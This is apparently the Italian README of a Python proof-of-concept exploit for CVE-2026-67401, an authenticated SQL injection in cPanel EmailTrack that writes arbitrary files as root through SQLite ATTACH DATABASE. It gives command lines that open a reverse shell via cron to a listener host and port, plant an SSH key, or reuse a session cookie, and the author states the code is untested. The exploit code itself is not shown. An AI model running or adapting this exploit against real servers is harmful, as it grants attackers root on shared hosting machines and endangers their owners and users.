
Proof-of-concept in Python per CVE-2026-67401, una SQL injection autenticata in cPanel EmailTrack che consente la scrittura arbitraria di file come root tramite SQLite ATTACH DATABASE, permettendo una reverse shell o il rilascio di chiavi SSH.
SQL injection in cPanel EmailTrack. Utente cPanel autenticato con privilegi di posta scrive file arbitrari come root tramite SQLite ATTACH DATABASE. Una sola richiesta per ottenere root. Non testato su un target reale, il codice è stato assemblato solo da informazioni pubbliche e un diff di base. Fai la dovuta diligenza come ricercatore, provalo e invia correzioni tramite PR.
Interessa tutte le build di cPanel/WHM precedenti alla patch del 8 settembre 2026.
requests# Reverse shell tramite cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# Rilascio chiave SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# Sessione esistente
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# Dry run (stampa la richiesta, non inviarla)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1